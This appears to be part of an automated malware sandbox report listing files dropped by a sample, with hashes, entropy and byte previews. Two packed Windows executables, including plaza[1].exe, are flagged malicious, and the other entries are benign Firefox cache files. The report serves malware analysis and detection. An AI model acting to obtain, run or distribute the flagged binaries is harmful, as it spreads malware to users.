                                                                                                                                                                                  SHA1:404EFBEAE6B921DCFC1FBE5B90EE47E5FB7B8038
                                                                                                                                                                                  SHA-256:B29798AA1B8E46207A37CCD73613B87BC8F2A6D50774D0079CF7AB341B1EBB3D
                                                                                                                                                                                  SHA-512:5C026CDC1752F026D37AF3619E78565EDC8896DA35D65B373042D200A7C95003518B01D825B5101CD013F7F142505B5F1328D177202C3F76489C1BF787238A52
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..........PE..L......e...............".....V........\...........@...........................\.....}.$...@.................................W...k....`...C.......................................................................................................... . .P..........................@....rsrc....C...`......................@....idata ............................@... ..-.........................@...gakjennq.p...@A..j..................@...brsozmps......\......x$.............@....taggant.0....\.."...|$.............@...................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\plaza[1].exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3001856
                                                                                                                                                                                  Entropy (8bit):7.9902601078319515
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:49152:fBAdrMlL5e9wo9gMj0rnjBzhDqRBsFhU186LnFrq/OdncDhIYaMFEFT:KtJwogMYDll+R6FhtYdEwnW+YaMFqT
                                                                                                                                                                                  MD5:A19B05B874E77B99515C397C5DE13F48
                                                                                                                                                                                  SHA1:6996028DDF12116E8BB0FBCD5FA693DE0E14B78A
                                                                                                                                                                                  SHA-256:C6DC8E17A1D4A1545A12027D8FB15A2C625CE3781CD2062976861CEBAAE37A9A
                                                                                                                                                                                  SHA-512:4E0B6AA347062911D76DD6C6D575FD82CFA7F2C8C0A308967E77DC1ABDA2C7E14DFD0942869BDDD59E800359490FD2FC1AF08FFCD466428347473E20136001A4
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L...N@.e...............".....`......$............@......................................@... .. .... .. .......... `.......l..x....0..h....................`.......................................................................................................4..................@............p......."...8..............@............@...0.......Z..............@............0...p.......b..............@....................d...b..............@....rsrc....0...0...0..................@..@..........x..`...(..................@....data.....!..0....!.................@...................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\12538

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):188
                                                                                                                                                                                  Entropy (8bit):5.034151834805834
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:8llmlhO1YP3Ru/l3BMqEcldnX+OGTAMrRzcSLUxGTKlLjOKf6TaxXA8AsO7WYUmk:00hycKRiclp+OGb9LUxG0OKlmeO7WOen
                                                                                                                                                                                  MD5:FD65445315265AA7767443B9C5C520DF
                                                                                                                                                                                  SHA1:6FCE6A40E1B81753D9F463AD0906ACE1EABD2DB0
                                                                                                                                                                                  SHA-256:B540319A450B5AE67CA3A556A33A20BF5D321881840155D9EA3BEC7CDD4314C4
                                                                                                                                                                                  SHA-512:F776E58668A565FC962B24AAD69C0DB0A7626F34586EEE4EA9C4E6189878C40A6EB5C672DDE827C38ABFB412646A071D1AC2917182B67B8C3408134534889976
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:B..b........e..e..F.A........B....O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/.necko:classified.1.net-response-time-onstart.6331.net-response-time-onstop.25581.....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\12544 (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):107
                                                                                                                                                                                  Entropy (8bit):4.562912914800682
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:xShOwllZRtl3BMqEcldnX+OGTAMrRzcSLUxGTKllllln:xShNlTPRiclp+OGb9LUxGmln
                                                                                                                                                                                  MD5:6FE364DD69D62B8B9ACE2307B8CD9E6E
                                                                                                                                                                                  SHA1:ED144759CA05CFC4A7D399C26534E489567348F8
                                                                                                                                                                                  SHA-256:9CE7B41B07C7ACC5964248C8CD61CD6C21AC0E7DA4A26801C2E15B577F638115
                                                                                                                                                                                  SHA-512:477E04168DCE2C75DA1059831AA06CFCC1CE29EA1DEAB0DF6EF517CD076E8DF9467AD980861B053DB60270D6B2EB6A9EF616EFBA99F4B1437D78661053A3D396
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:z{..........e..................B....O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/.....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\1725

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15967
                                                                                                                                                                                  Entropy (8bit):6.072108678600926
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:y7VqN4mApqN3Xo70tNo+pwPm082nyFz/a7J:vApQHkKo+pwPo2J
                                                                                                                                                                                  MD5:8ACD80133AEBE337B69DAD4FE9794CA8
                                                                                                                                                                                  SHA1:506E108630FB33385026B09AD5A89289813DCDDE
                                                                                                                                                                                  SHA-256:F5122F86B0E46D166B264EDD8E225A2EB64A58F736D233CC3AD14E47A13415EB
                                                                                                                                                                                  SHA-512:13EB0D15D027802369222E111BB452861DE9E736150A988E9062D69F927078D7EFCEAD5B63F5911E7CA5EDF454D8FD58947F541CA34CA8C29920F2325CAE7CBC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... ..R%.\.%sv.....}...ht~..s..P..6].A...ro....-FY..-..N....(".....T.."..Y...m.b. = ...UU...:5.-.i>..gj....$.g#..]...........:K5a./f. .U.H..t....:..7.D...F....fAl'.}..e......q.8.9..X..r......;. .....F.*.A......n.Y......}..$0z....N.v.D.....N...,..dr.........e...e..!F.B.g.....k....O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/s/desktop/87423d78/cssbin/www-onepick.css.necko:classified.1.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAA5iMIIOXjCCDUagAwIBAgIRAJKc339ZwIrpCZuMyXFusEowDQYJKoZIhvcNAQELBQAwRjELMAkGA1UEBhMCVVMxIjAgBgNVBAoTGUdvb2dsZSBUcnVzdCBTZXJ2aWNlcyBMTEMxEzARBgNVBAMTCkdUUyBDQSAxQzMwHhcNMjQwMTI5MDgwNDQ3WhcNMjQwNDIyMDgwNDQ2WjAXMRUwEwYDVQQDDAwqLmdvb2dsZS5jb20wWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAASB6wVGdBTGrYTNLOgcSDG0+J3gPo8rFeHbl1W+ZIBjbbIlAbGtcHWlO5LiWvX/9Ra4EykTj2Z2HH1qM2RuWespo4IMPzCCDDswDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQ

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\19585 (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):35420
                                                                                                                                                                                  Entropy (8bit):5.086270303730476
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:aPtFYceo3KtwnY9nR+eXHxoZ/HJkNTBdHOT5Qhh7veK8t9KZF:Aeo3KtwnY9nR+eXHcHJk/dHOTij753F
                                                                                                                                                                                  MD5:B1846D94A205AFE84DA14DED30FC1A61
                                                                                                                                                                                  SHA1:A5EFD82AD8412B4AC7435381203142DF9DF4A602
                                                                                                                                                                                  SHA-256:928B27C3C7243586603625ABC511829C330C004D87D447483C337BABA37FF715
                                                                                                                                                                                  SHA-512:4A429E99C151CF5641DC3A9F68E68C8814109673EC2AE6DC71097A6FA86681FAA6FB0E9A6C3A0532553C3DFEDE8D26B1FADEEF8C2FCAFE653D31FF241DA28907
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<!doctype html>.<html>. <head>. <meta charset="utf-8">. <meta http-equiv="Content-Security-Policy" content="default-src 'none'; object-src 'none'; script-src resource: chrome:; connect-src https:; img-src https: data: blob: chrome:; style-src 'unsafe-inline';">. <meta name="color-scheme" content="light dark">. <title data-l10n-id="newtab-page-title"></title>. <link rel="icon" type="image/png" href="chrome://branding/content/icon32.png"/>. <link rel="localization" href="branding/brand.ftl" />. <link rel="localization" href="toolkit/branding/brandings.ftl" />. <link rel="localization" href="browser/newtab/newtab.ftl" />. <link rel="stylesheet" href="chrome://browser/content/contentSearchUI.css" />. <link rel="stylesheet" href="chrome://activity-stream/content/css/activity-stream.css" />. </head>. Cached: Wed, 21 Feb 2024 11:30:40 GMT -->. <body class="activity-stream">. <div id="header-asrouter-container" role="presentation"></div>. <div id="r

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\20257 (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8559
                                                                                                                                                                                  Entropy (8bit):6.096215849886045
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:QNuoeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdUtdU8:QNuoeLYGBRohB1r1uk/KiFTaIdaOf
                                                                                                                                                                                  MD5:A4202F3AE8B916989D843AE3D806989E
                                                                                                                                                                                  SHA1:FB130000DC42AE9397B3B0CC5DF195F1255194F9
                                                                                                                                                                                  SHA-256:0B61A645009DA02B5920C1886F749723B9152779788E39E01640FB72AC37E0DD
                                                                                                                                                                                  SHA-512:53485E081605AB1AFE3FBCA32F8ACD51E2F21A3DEA7F2495D69CDBEBD140460421AA000920D3CE7B994BCD76EC123C868C5AE305416C70B7FE85B56D142400F8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"project_name":"Remote Settings PROD","project_version":"18.0.0","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"batch_max_requests":25,"readonly":true,"explicit_permissions":false},"capabilities":{"changes":{"description":"Track modifications of records in Kinto and store the collection timestamps into a specific bucket and collection.","url":"http://kinto.readthedocs.io/en/latest/tutorials/synchronisation.html#polling-for-remote-changes","version":"32.0.3","collections":["/buckets/blocklists","/buckets/blocklists-preview","/buckets/main","/buckets/main-preview","/buckets/security-state","/buckets/security-state-preview"]},"attachments":{"description":"Add file attachments to records","url":"https://github.com/Kinto/kinto-attachment/","version":"6.4.0","base_url":"https://firefox-settings-attachments.cdn.mozilla.net/"}}}|..3.............e...F.A.e..[...2....:https://firefox.settin

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\20787 (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15844
                                                                                                                                                                                  Entropy (8bit):5.972901528432223
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:m7VqN4mApqN3Xo70tNo+pwPm082nyFz/iBY:TApQHkKo+pwPo2C
                                                                                                                                                                                  MD5:CBE0351FC76E873EC16491586802CA21
                                                                                                                                                                                  SHA1:D5F478368D65792CEFE1600B22A7C0B1D73AD26E
                                                                                                                                                                                  SHA-256:BC6DC35E0126B99B5F1B8C49FCB6A17FE989B09C02B0CB1DB53F45AF743D25DD
                                                                                                                                                                                  SHA-512:A46FD3EA895ACE389AA834AAFB6B14BDB6AB78A246A2C132CD53D42D29648BBAE3D72BCC2ADD8244D529353AA63F631C055654C8D70644ECE7DA548CF8230257
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:................e...F.B.e......E....O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/.strongly-framed.0.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAA5iMIIOXjCCDUagAwIBAgIRAJKc339ZwIrpCZuMyXFusEowDQYJKoZIhvcNAQELBQAwRjELMAkGA1UEBhMCVVMxIjAgBgNVBAoTGUdvb2dsZSBUcnVzdCBTZXJ2aWNlcyBMTEMxEzARBgNVBAMTCkdUUyBDQSAxQzMwHhcNMjQwMTI5MDgwNDQ3WhcNMjQwNDIyMDgwNDQ2WjAXMRUwEwYDVQQDDAwqLmdvb2dsZS5jb20wWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAASB6wVGdBTGrYTNLOgcSDG0+J3gPo8rFeHbl1W+ZIBjbbIlAbGtcHWlO5LiWvX/9Ra4EykTj2Z2HH1qM2RuWespo4IMPzCCDDswDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFJDWIvFi4WYw5Ts43/kaYiM+0kSvMB8GA1UdIwQYMBaAFIp0f6+Fze6VzT2c0OJGFPNxNR0nMGoGCCsGAQUFBwEBBF4wXDAnBggrBgEFBQcwAYYbaHR0cDovL29jc3AucGtpLmdvb2cvZ3RzMWMzMDEGCCsGAQUFBzAChiVodHRwOi8vcGtpLmdvb2cvcmVwby9jZXJ0cy9ndHMxYzMuZGVyMIIJ7wYDVR0RBIIJ5jCCCeKCDCouZ29vZ2xlLmNvbYIWKi5hcH

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\22528

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16730
                                                                                                                                                                                  Entropy (8bit):6.283149833978739
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:Z/+y7VqN4mApqN3Xo70tNo+pwPm082nyFz/aXE:Z/+vApQHkKo+pwPo2Y
                                                                                                                                                                                  MD5:97808674090C291F5B4EC70577362ED6
                                                                                                                                                                                  SHA1:B8B7843BFB86A5210571AABD3856D07C7E0A8986
                                                                                                                                                                                  SHA-256:A4F77ECF5F19B4303B4E3990B8CE987B1630A36AB7A69616782F459E8B98AFFF
                                                                                                                                                                                  SHA-512:5292F5119C7F85AFE37B2E55688D20D68C828F6D9BC197601B5DA3D8E88854EB3BD5CE07D2DD05F49D3AACF04EEA5CEFC664F5B55C2E984952B55F2995DA95A8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.8.. .m...9$L3...g..#EVZl.......?..x"6v..s......@rkD.H.3k.....V.v....J....h5.;..5..8IX...K..G.|Y.C..<...T..iX>........H.....u4...f.? A...._..4.%$}......S&{V.V..BT.....b............xd..P.4.rB k.....z.cR)&.h....O...*GKS......'n..R..D......vv^.O.$.&.m.(.J..3..9.z.n.TP<B8.0M...,..S.y..Xt....=.y.7.=..).9z.c..}Y.....uG,k..n'.G..6y8\|....~.]..uWNy..s!2.r82.V.+.;..=..V/j.....~... ....0..tc-<...<J'..,.'...r....F....{..S.5..w...p..9.,....`.-;...WF.....M1.N.U#}..^K....:<..UY.....wj.kK..2....#>X.B...n$4......MX;..AJ...H...S.#.....c.....El.....S1.A.....?.d9~.M.H...V2..h.!.K...&.....a..7<.e.I..o.y.+.b.....P...Z..1...!B.u-...,...a.%`..B..8...^].av.#.B.v..s..o..0.)G..'$nQ......ln.t2R..,..Q..L.lT.[KHW..=....I..(.u.....OQ...(I.(.T..."%...,i ....n'{f..-5.ww.0.cGmI!..aU.+O."}....}.........G5)WZ?.......i..(Vy....).F.A............C#..........cS.....6+..|....:.\.%...0\cT-....,..,....J....J..#x...|C....=.....b.VX..5.)...P....t=(..,$:m..Z..b`..O..Yz..n..f5.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\25819 (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):114
                                                                                                                                                                                  Entropy (8bit):4.680522047781059
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:4pqOwllZRtEtqiBMqEcldnX9XHWwrRzcSLYXqhHK//l:HNlTKiclpJWw9LYX2Kl
                                                                                                                                                                                  MD5:443F7AB19C3AF2A87FC04E037CD3CCEA
                                                                                                                                                                                  SHA1:E191165DEA7264BF984A3FEE526B708D32528924
                                                                                                                                                                                  SHA-256:9B98680185C873516C9A408EF8CACB468EC400971A923BF6C85F29C74BCC7E5F
                                                                                                                                                                                  SHA-512:0974F1E1A557305326767D715312CF6DCAEDC1AAE3C89C31F8BEB4D748B3FE4CCE4B4D8E5CE65E82ED5E96DF23B7F87FD096C091E45BB8FE624D76B0E127679F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:=...........e..................I....O^partitionKey=%28https%2Cfacebook.com%29,:https://www.facebook.com/video.....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\32062

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16726
                                                                                                                                                                                  Entropy (8bit):6.27974894074114
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:eXW7VqN4mApqN3Xo70tNo+pwPm082nyFz/aDD:eXjApQHkKo+pwPo2L
                                                                                                                                                                                  MD5:57E3CFE24F936E2F317534B6146B8674
                                                                                                                                                                                  SHA1:BB6129048944DAF542B55D9564B7BFA262A5A895
                                                                                                                                                                                  SHA-256:914802E1E533E1E4595A8918F047BF0EA82A246D561A0443E0E6936827951067
                                                                                                                                                                                  SHA-512:C9EE8080671C261A9052AEDF33580AD08C60C05CF1773F89CE5731FFCCAEE78E7E86B82F7237DC56EAEBE2DC3A9BC1E66E1FD1304D6D3B93C302FFF6B422D416
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:... .6.V.@>..TZv.8I.....~..$b..IR_y..z.BY?...tr.Q.Ogr..1........l....X.SS.-..61.!...6<...a3...w..[o.]..$$.n.u..ba...G...y}.[.Y.*'..N.v..Z;.i..8.<.FV.x.|.................1.i0.n0.B.<.U..:5U...kbp.{N2...p.]......./.....bLs....cd...7.R.......}.....<1.....[].T..Q...4....ub..._.$...W..D&.............d...+!C8~..$@.x....E.)........e....%r..Oz..#I....,..|Xsc.z'=.|....b..i..5.(..m.8k.t...b.R{.mM.5$=Xx.C...P.k..A.:2..](H...xh......w&..x..c.....5..{gL_QV.._.[.3X.~..E....F...'.F".1.Q......<...6.. ..|[...=..UtO...u..~_....,..Y...1/BI.s..A.....)toF..x..@u.YP.l..."a.|$..RlU..xhG..(.W.r5F...P...B..IXb....e...t...*V.PI.z+.......'..."c#.......Ct.sO.~.@.Qf...e......=....Dj....9.Y.0....*..z...l..$9...9...A....aAw...L...~.0....\.I...T.Vk....8..y]..u...H......%..vZ/n.?..<...<.UP.J......:qP.,..X]......k........G..Rh...W!.B.4....9....M!..i2R.y.-..l...LfEa#........E..V.RQI..x ._1B1..<.~.pr&.$...c*.4r.R.*..i.Mi.1n\..vP.%.......8e.Y..!..r.q.3.y...dk....a./.X.~.X..).$.......

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\02F6463DFBFAC08B94C9FDAACB7AA66D176E53B7

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):21815
                                                                                                                                                                                  Entropy (8bit):5.768346428320375
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:DGhqb4AexlNlP3me3mjeLYGBRohB1r1uk/KiFTaIdaOb:DGhqbNeVlP2e2je8GvIDuuKOa8b
                                                                                                                                                                                  MD5:D8BFC40DF3F6C81C451CEF05B6687033
                                                                                                                                                                                  SHA1:93B681803E23A8ED6D722501198F6FDDE4E08D22
                                                                                                                                                                                  SHA-256:4B34F0EEEE30C278C1B0BA88BE53234A6118D68F0EA254469DCC0EA92B96B1B0
                                                                                                                                                                                  SHA-512:7101BA84B94E961FC6273E382806B1978A4087FE29B75F6861DCCAEFE94A132AAD989D5836980840E179E16C91E5CA128B9D322D64B8A56CC84E4373BBC70BA7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"sort":"-last_modified","schema":{"type":"object","required":["webExtension"],"properties":{"params":{"$ref":"#/definitions/params"},"default":{"$ref":"#/definitions/default"},"appliesTo":{"type":"array","items":{"$ref":"#/definitions/appliesToSection"},"title":"Applies To","description":"This section defines the region/locales/application information for where a search user is available, and any specifics for that region/locale/application. If there are no entries in the list, it is considered to be included everywhere"},"orderHint":{"$ref":"#/definitions/orderHint"},"extraParams":{"$ref":"#/definitions/extraParams"},"telemetryId":{"type":"string","title":"Telemetry Id","description":"The telemetry Id as used for some of SEARCH_COUNTS telemetry."},"regionParams":{"$ref":"#/definitions/regionParams"},"webExtension":{"$ref":"#/definitions/webExtension"},"defaultPrivate":{"$ref":"#/definitions/defaultPrivate"},"sendAttributionRequest":{"$ref":"#/definitions/sendAttribution

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\04D7EE6004D921B7B7963A7DF7A92640D492B76E

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 3758227456
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11621
                                                                                                                                                                                  Entropy (8bit):6.406362354284618
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:kkKsIx8mq4ezAcYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0Axk0CvDXU:PK3fqFymzwTWvoglJmzwTWvogrBHJm2Y
                                                                                                                                                                                  MD5:BEDAF48A9BEA4C3F9C9C3F718F2184E5
                                                                                                                                                                                  SHA1:A084FB076C0BAF2F2711B050B579F4EF80EF03D8
                                                                                                                                                                                  SHA-256:200F9550FC28808778525B93A3CAE29848586BB44E012179F87545878552C276
                                                                                                                                                                                  SHA-512:5D16D698E914E59C70A4612D9F7B7684B9A9E0EEC2CDA32435218CE5ACDA783F2D8704EAC307740CE5DBB4E3280EC48A2D7BF60C9D153B2661FDBD812DC6F33B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........T.k.8...."..E.1...q6b.5.6l).;..;.1.G..+........v~4.v.O..53o.{.l....~...m '...K....._.pK.Z.../_..ff..c..OXOw.....'.~i'..l..c5...x. 5LAi....N.. o.,AcY.P.......%.'..zE]....b.`9..[......O<6.mM~[...Fm.!R.l....n..W.eC@....0.2...=u. %....e..".f,..q...6|.b.w".<.q..k...E.0.......~7...@W..H~.....q.i...c..G.......".X\$'...o3.`..=F.0....."Eq..............#8..A....i..3...\.*.......l.i....Y`|...Q....I..5.BA...9....{i.b8.3....Q..Z7.."9....>...&E.h7Up.f...._....\.{].O.jo....9U.....zlg.ubSSYa.....`. ...x(m.#...{....y7,i..T(..G.a.].... ........)..).......U....j..Q.MU..X..}.(..G.......Q|L.B....D.DA. ....z...[9Q..5..t..t......#..`3.>.......z.k`M/b...u}...0'..4z...V...M.i3Z..t..jo..y<y.n......K.a......@.......&........e...e...F.B.g.C....g....O^partitionKey=%28https%2Cgoogle.com%29,:https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.J6zlSvuPGsg.es5.O/ck=boq-identity.AccountsSignInUi.RCgm07LyQic.L.F4.O/am=P2CJlmMBEISZlnP-nnFyGAAAAA

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\09322B71F589687BEBF63EB78EC8794BD5CAFC26

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 196608
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11693
                                                                                                                                                                                  Entropy (8bit):6.421845872364408
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ePOFS7uRSj8TUmezPYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0Axk0CY:JS7cSjMUzWmzwTWvoglJmzwTWvogrBHI
                                                                                                                                                                                  MD5:C80741957065DBFF0A213488833AC90C
                                                                                                                                                                                  SHA1:86D589420D637F3639C0FBE76D0487DD22B614F3
                                                                                                                                                                                  SHA-256:BAEF12303ECB8E1B4A66FDEE40448B51D7164DF5A538B38FB2771B9BED5E26BC
                                                                                                                                                                                  SHA-512:1BC39CA2A062755BF12EFE2FE81DD3CC0D74468EEB514470D9C4EEC43E80F058E238D34935C081F82213B706EA533DC61C8E54CA6DF42BC7FEB1116C776423FC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........U]o.0.}.H.i.%...0T.....R..B.$V...$......|Ty.c.{.=.\.Mbh.:.\w-=.1..$..y.(...D.........(.e....%..+.D.*.VKGi.r..u...R..V........C.Y. .!.~g..U.bt..w:...].W;./,.:..%..b..{f....Z^.mN.E..He....}...qx...(*.".u....[..?.fB....9..x..(..=..>.C....RI..6.\.R.{}F.?..P.e.s......0q..7....`.c..D.K...s...W9...5..9U...K.$`...U.g.p:g....e..../h.$3H...T.KI..:....~)06u.f.1..9.0.h.J=..U.Y.....?....c2B..sb....T>f..&.F....N.C.....q...W...lVW..\.w&#....~.\$.q.|..s.....1..@..[...4...c..!.....!..#.. ..$.....QF....D[..q<.a..^y..4.#|..a..v.x...@M.....J...|......5..D....Q......<..T<H..k.U.|....L...}..!Jb..YT.F...h.yA*..h..E..X.....Y.sa.a..w.=g.....;i..2.n......}..6.<s..x3..n.q...,8.|....-./...J..p.*..h....V..}.....C.i.?..s.[......0V.........e...e...F.B.g.C.........O^partitionKey=%28https%2Cgoogle.com%29,:https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.J6zlSvuPGsg.es5.O/ck=boq-identity.AccountsSignInUi.RCgm07LyQic.L.F4

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\0B912A01F27BF59AF15E1D362EE90FF23A7A38C7

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 3053780992
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12327
                                                                                                                                                                                  Entropy (8bit):6.618669962479176
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:+c+ELmZqlFmzwTWvoglJmzwTWvogrBHJm2OdAnAyCvDxkCvDx9:+c+6ARzSWvoI8zSWvoIBHJmvOq
                                                                                                                                                                                  MD5:69894EDC3DEA76EC42D9E73125554C02
                                                                                                                                                                                  SHA1:4DC29EE73C7979D94A91DB721A2B281666B5BC62
                                                                                                                                                                                  SHA-256:8260330963F8806BA25ADE97421D06C3F3F5DBDA16E9A07349CDF007F179763E
                                                                                                                                                                                  SHA-512:5F9B34F3A550CEFF0D7568BB259F30415DF5F57E026D78275E679F95DE9EBAABE4918A3750687D243C0B06AEB5FE39F0B383FE8BAB87345361570C14B97C9455
                                                                                                                                                                                  Malicious:false
